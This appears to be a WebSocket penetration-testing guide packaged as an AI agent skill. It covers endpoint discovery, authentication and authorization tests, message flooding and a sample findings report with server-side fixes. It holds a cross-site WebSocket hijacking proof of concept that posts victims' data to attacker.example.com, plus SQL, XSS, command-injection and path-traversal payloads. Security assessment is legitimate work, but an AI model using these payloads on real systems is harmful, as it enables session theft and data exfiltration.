Testing WebSocket implementations for authentication bypass, cross-site hijacking, injection attacks, and insecure message handling during authorized security assessments.
npx skill4agent add mukul975/anthropic-cybersecurity-skills exploiting-websocket-vulnerabilities
cargo install websocat
npm install -g wscat
pip install websockets
# Check for WebSocket upgrade in response headers
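# (-I would send a HEAD request, which cannot be upgraded; send GET and print only the response headers)
curl -s -o /dev/null -D - --http1.1 --max-time 5 \
  -H "Upgrade: websocket" \
  -H "Connection: Upgrade" \
  -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
  -H "Sec-WebSocket-Version: 13" \
  "https://target.example.com/ws"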
# Common WebSocket endpoint paths
for path in /ws /websocket /socket /socket.io /signalr /hub \
            /chat /notifications /live /stream /realtime /api/ws; do
  echo -n "$path: "
  # --max-time keeps curl from waiting indefinitely on a connection that was upgraded (101)
  status=$(curl -s -o /dev/null -w "%{http_code}" --http1.1 --max-time 5 \
    -H "Upgrade: websocket" \
    -H "Connection: Upgrade" \
    -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
    -H "Sec-WebSocket-Version: 13" \
    "https://target.example.com$path")
  echo "$status"
done
# Check for Socket.IO
curl -s "https://target.example.com/socket.io/?EIO=4&transport=polling"
# Check for SignalR
curl -s "https://target.example.com/signalr/negotiate"
# In browser DevTools:
# Network tab > Filter: WS
# Look for ws:// or wss:// connections
# Examine the upgrade request and WebSocket frames
# Test connection without authentication
wscat -c "wss://target.example.com/ws"
# If connection succeeds without tokens, auth is missing
# Test with expired/invalid token
wscat -c "wss://target.example.com/ws" \
-H "Cookie: session=invalid_or_expired_token"
# Test connection with stolen/replayed session
wscat -c "wss://target.example.com/ws" \
-H "Cookie: session=valid_session_from_another_user"
# Test token in WebSocket URL parameter
wscat -c "wss://target.example.com/ws?token=invalid_token"
# Test if authentication is only checked at connection time
# Connect with valid token, then check if messages still work
# after the token expires or the user logs out
# Using Python for automated testing
python3 << 'PYEOF'
import asyncio
import websockets

async def test_no_auth():
    try:
        async with websockets.connect("wss://target.example.com/ws") as ws:
            print("Connected WITHOUT authentication!")
            # Try sending a message
            await ws.send('{"type":"get_data","resource":"users"}')
            response = await ws.recv()
            print(f"Response: {response}")
    except Exception as e:
        print(f"Connection failed: {e}")

asyncio.run(test_no_auth())
PYEOF
# Check Origin header validation on WebSocket upgrade
# (send GET rather than HEAD: a HEAD request from -I cannot be upgraded)
curl -s -o /dev/null -D - --http1.1 --max-time 5 \
  -H "Upgrade: websocket" \
  -H "Connection: Upgrade" \
  -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
  -H "Sec-WebSocket-Version: 13" \
  -H "Origin: https://evil.example.com" \
  "https://target.example.com/ws"
# If 101 Switching Protocols: the foreign Origin was accepted (vulnerable to CSWSH when auth is cookie-based)
# If 403 or another non-101 status: the Origin is being rejected
<!-- Cross-Site WebSocket Hijacking PoC -->
<!-- Host on attacker-controlled server -->
<html>
<head><title>CSWSH PoC</title></head>
<body>
<h1>Cross-Site WebSocket Hijacking</h1>
<div id="messages"></div>
<script>
// This connects to the target's WebSocket using the victim's cookies
var ws = new WebSocket("wss://target.example.com/ws");
ws.onopen = function() {
console.log("WebSocket connected (using victim's session)");
// Request sensitive data through the WebSocket
ws.send(JSON.stringify({type: "get_messages", channel: "private"}));
ws.send(JSON.stringify({type: "get_profile"}));
};
ws.onmessage = function(event) {
console.log("Data stolen: " + event.data);
document.getElementById("messages").innerText += event.data + "\n";
// Exfiltrate to attacker server
fetch("https://attacker.example.com/collect", {
method: "POST",
body: event.data
});
};
ws.onerror = function(error) {
console.log("WebSocket error: " + error);
};
</script>
</body>
</html>
# Using wscat for manual message injection testing
wscat -c "wss://target.example.com/ws" \
-H "Cookie: session=valid_session_token"
# Once connected, send test messages:
# SQL injection in WebSocket message
# > {"action":"search","query":"' OR 1=1--"}
# XSS payload in chat message
# > {"type":"message","content":"<script>alert(document.cookie)</script>"}
# > {"type":"message","content":"<img src=x onerror=alert(1)>"}
# Command injection
# > {"action":"ping","host":"127.0.0.1; whoami"}
# Path traversal
# > {"action":"read_file","path":"../../../etc/passwd"}
# IDOR in WebSocket messages
# > {"action":"get_messages","channel_id":1}
# > {"action":"get_messages","channel_id":2} (another user's channel)
# Automated injection testing with Python
python3 << 'PYEOF'
import asyncio
import websockets
import json

PAYLOADS = [
    {"action": "search", "query": "' OR 1=1--"},
    {"action": "search", "query": "<script>alert(1)</script>"},
    {"action": "search", "query": "{{7*7}}"},
    {"action": "search", "query": "${7*7}"},
    {"action": "read", "file": "../../../etc/passwd"},
    {"action": "exec", "cmd": "; whoami"},
]

async def test_injections():
    # websockets 14+ takes additional_headers; older releases call this parameter extra_headers
    async with websockets.connect(
        "wss://target.example.com/ws",
        additional_headers={"Cookie": "session=valid_token"}
    ) as ws:
        for payload in PAYLOADS:
            await ws.send(json.dumps(payload))
            try:
                response = await asyncio.wait_for(ws.recv(), timeout=5)
                print(f"Payload: {json.dumps(payload)}")
                print(f"Response: {response}\n")
            except asyncio.TimeoutError:
                print(f"Timeout for: {json.dumps(payload)}\n")

asyncio.run(test_injections())
PYEOF
# Test accessing other users' data via WebSocket
python3 << 'PYEOF'
import asyncio
import websockets
import json

async def test_authz():
    # websockets 14+ takes additional_headers; older releases call this parameter extra_headers
    async with websockets.connect(
        "wss://target.example.com/ws",
        additional_headers={"Cookie": "session=user_a_session"}
    ) as ws:
        # Try accessing User B's private data
        messages = [
            {"type": "subscribe", "channel": "user_b_private"},
            {"type": "get_history", "user_id": "user_b_id"},
            {"type": "admin_action", "action": "list_users"},
            {"type": "send_message", "to": "admin", "as": "admin"},
        ]
        for msg in messages:
            await ws.send(json.dumps(msg))
            try:
                response = await asyncio.wait_for(ws.recv(), timeout=5)
                print(f"Sent: {json.dumps(msg)}")
                print(f"Received: {response}\n")
            except asyncio.TimeoutError:
                print(f"No response for: {json.dumps(msg)}\n")

asyncio.run(test_authz())
PYEOF
# Test rate limiting on WebSocket messages
python3 << 'PYEOF'
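import asyncio
import websockets
import json
import time
from websockets.exceptions import ConnectionClosed

async def test_rate_limit():
    # websockets 14+ takes additional_headers; older releases call this parameter extra_headers
    async with websockets.connect(
        "wss://target.example.com/ws",
        additional_headers={"Cookie": "session=valid_token"}
    ) as ws:
        start = time.time()
        sent = 0
        try:
            for i in range(1000):
                await ws.send(json.dumps({
                    "type": "message",
                    "content": f"Flood message {i}"
                }))
                sent += 1
        except ConnectionClosed:
            # The server dropped the connection mid-flood, which suggests some limit is enforced
            print(f"Connection closed by server after {sent} messages")
        elapsed = time.time() - start
        print(f"Sent {sent} messages in {elapsed:.2f} seconds")
        if sent == 1000:
            print("All messages accepted: no rate limiting observed, DoS may be possible")

asyncio.run(test_rate_limit())
PYEOF
# Check if WebSocket uses WSS (encrypted) or WS (plaintext)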
# WS (ws://) traffic can be intercepted by network attackers
# Check for mixed protocols
# Application on HTTPS but WebSocket on WS = insecure
curl -s "https://target.example.com/" | grep -oP "ws://[^\"']+"
# Any match above is a plaintext ws:// endpoint; the page should reference only wss:// (encrypted WebSocket)
# Test Sec-WebSocket-Protocol header handling
wscat -c "wss://target.example.com/ws" \
-H "Sec-WebSocket-Protocol: admin-protocol"
# Test for compression side-channel (CRIME-like attacks)
# Check if Sec-WebSocket-Extensions includes permessage-deflate
# (send GET rather than HEAD: a HEAD request from -I cannot be upgraded)
curl -s -o /dev/null -D - --http1.1 --max-time 5 \
  -H "Upgrade: websocket" \
  -H "Connection: Upgrade" \
  -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
  -H "Sec-WebSocket-Version: 13" \
  -H "Sec-WebSocket-Extensions: permessage-deflate" \
  "https://target.example.com/ws" | grep -i "sec-websocket-extensions"
# permessage-deflate with secrets in messages can leak data via compression
# Test WebSocket connection persistence
# Check if server implements proper timeouts and connection limits

| Concept | Description |
|---|---|
| WebSocket Handshake | HTTP upgrade request that transitions the connection from HTTP to WebSocket protocol |
| CSWSH | Cross-Site WebSocket Hijacking - exploiting missing Origin validation to hijack sessions |
| Origin Validation | Server-side check that the WebSocket upgrade request comes from a trusted origin |
| Message-level Authorization | Verifying permissions for each WebSocket message, not just at connection time |
| WSS | WebSocket Secure - encrypted WebSocket connection over TLS (equivalent to HTTPS) |
| Socket.IO | Popular WebSocket library with automatic fallback to HTTP long-polling |
| Ping/Pong Frames | WebSocket keepalive mechanism; can be abused for timing attacks |
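
The handshake row above can be made concrete with a small check. A compliant server answers the upgrade request with a `Sec-WebSocket-Accept` header derived from the client's `Sec-WebSocket-Key` and a fixed GUID defined in RFC 6455. The sketch below computes the expected value so a `101` response can be checked as a genuine WebSocket handshake rather than a proxy or placeholder reply. The function name `expected_accept` is an illustrative choice, not part of any tool mentioned here.

```python
import base64
import hashlib

# Fixed GUID defined by RFC 6455 for deriving Sec-WebSocket-Accept
WEBSOCKET_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"


def expected_accept(sec_websocket_key: str) -> str:
    """Return the Sec-WebSocket-Accept value a compliant server should send."""
    # SHA-1 over the client key concatenated with the GUID, then base64-encoded
    digest = hashlib.sha1((sec_websocket_key + WEBSOCKET_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


if __name__ == "__main__":
    # Same sample key used in the curl commands in this document
    print(expected_accept("dGhlIHNhbXBsZSBub25jZQ=="))
```

For the sample key `dGhlIHNhbXBsZSBub25jZQ==` used throughout the curl commands, the RFC 6455 example gives `s3pPLMBiTxaQ9kYGzzhZRbK+xOo=`, so that is the value to look for in the response headers.
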

| Tool | Purpose |
|---|---|
| Burp Suite Professional | WebSocket interception, modification, and history analysis |
| wscat | Command-line WebSocket client for manual testing |
| websocat | Versatile command-line WebSocket client written in Rust |
| Browser DevTools | Network tab WS filter for inspecting WebSocket frames |
| Socket.IO Client | Testing Socket.IO-based WebSocket implementations |
| Python websockets | Scripting automated WebSocket attack sequences |

## WebSocket Security Assessment Report
**Vulnerability**: Cross-Site WebSocket Hijacking (CSWSH)
**Severity**: High (CVSS 8.1)
**Location**: wss://target.example.com/ws
**OWASP Category**: A01:2021 - Broken Access Control
### WebSocket Configuration
| Property | Value |
|----------|-------|
| Protocol | WSS (encrypted) |
| Library | Socket.IO 4.x |
| Authentication | Cookie-based session |
| Origin Validation | NOT ENFORCED |
| Message Authorization | NOT ENFORCED |
| Rate Limiting | NOT IMPLEMENTED |
### Findings
| Finding | Severity |
|---------|----------|
| CSWSH - No Origin validation | High |
| Missing message-level authorization | High |
| XSS via chat message injection | Medium |
| No rate limiting on messages | Medium |
| Channel IDOR (subscribe to any channel) | High |
| WebSocket open after logout | Medium |
### Impact
- Private message exfiltration via CSWSH
- Account impersonation through unauthorized message sending
- Cross-channel data access affecting all users
- DoS via message flooding (no rate limits)
### Recommendation
1. Validate the Origin header during WebSocket handshake
2. Implement CSRF tokens in the WebSocket upgrade request
3. Enforce authorization checks on every WebSocket message
4. Sanitize all user input in WebSocket messages (prevent XSS/SQLi)
5. Implement message rate limiting per connection
6. Invalidate WebSocket connections on logout or session expiration
7. Use per-message authentication tokens rather than relying solely on the initial handshake
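
As a rough illustration of recommendations 1, 3, and 5, the following framework-independent sketch shows one way the server-side checks could look. Everything named here is an assumption made for the example: the `ALLOWED_ORIGINS` allow-list, the `user` dictionary layout, the message schema (borrowed from the test messages earlier in this document), and the `TokenBucket` parameters. A real application would wire these checks into its own WebSocket framework and session store.

```python
import time
from urllib.parse import urlsplit

# Hypothetical allow-list; replace with the application's real origins
ALLOWED_ORIGINS = {"https://target.example.com"}


def is_origin_allowed(origin_header):
    """Accept only an exact scheme://host[:port] match against the allow-list."""
    if not origin_header:
        return False  # missing Origin is rejected by default in this sketch
    parts = urlsplit(origin_header)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False  # covers values such as "null"
    return f"{parts.scheme}://{parts.netloc}".lower() in ALLOWED_ORIGINS


def is_message_authorized(user, message):
    """Per-message check with default deny (assumed user and message schema)."""
    msg_type = message.get("type")
    if msg_type == "admin_action":
        return user.get("role") == "admin"
    if msg_type == "subscribe":
        return message.get("channel") in user.get("channels", ())
    return False


class TokenBucket:
    """Per-connection rate limiter: `rate` tokens per second, bursts up to `capacity`."""

    def __init__(self, rate, capacity, now=None):
        self.rate = rate
        self.capacity = capacity
        self.tokens = float(capacity)
        self.updated = time.monotonic() if now is None else now

    def allow(self, now=None):
        now = time.monotonic() if now is None else now
        # Refill according to elapsed time, capped at capacity
        self.tokens = min(self.capacity, self.tokens + (now - self.updated) * self.rate)
        self.updated = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False
```

In use, `is_origin_allowed` would run once during the handshake, while `is_message_authorized` and `TokenBucket.allow` would run for every incoming message, closing the connection or dropping the message when either returns `False`. Exact-match comparison is chosen over substring or suffix checks so that look-alike origins such as `https://target.example.com.evil.example.com` are rejected.
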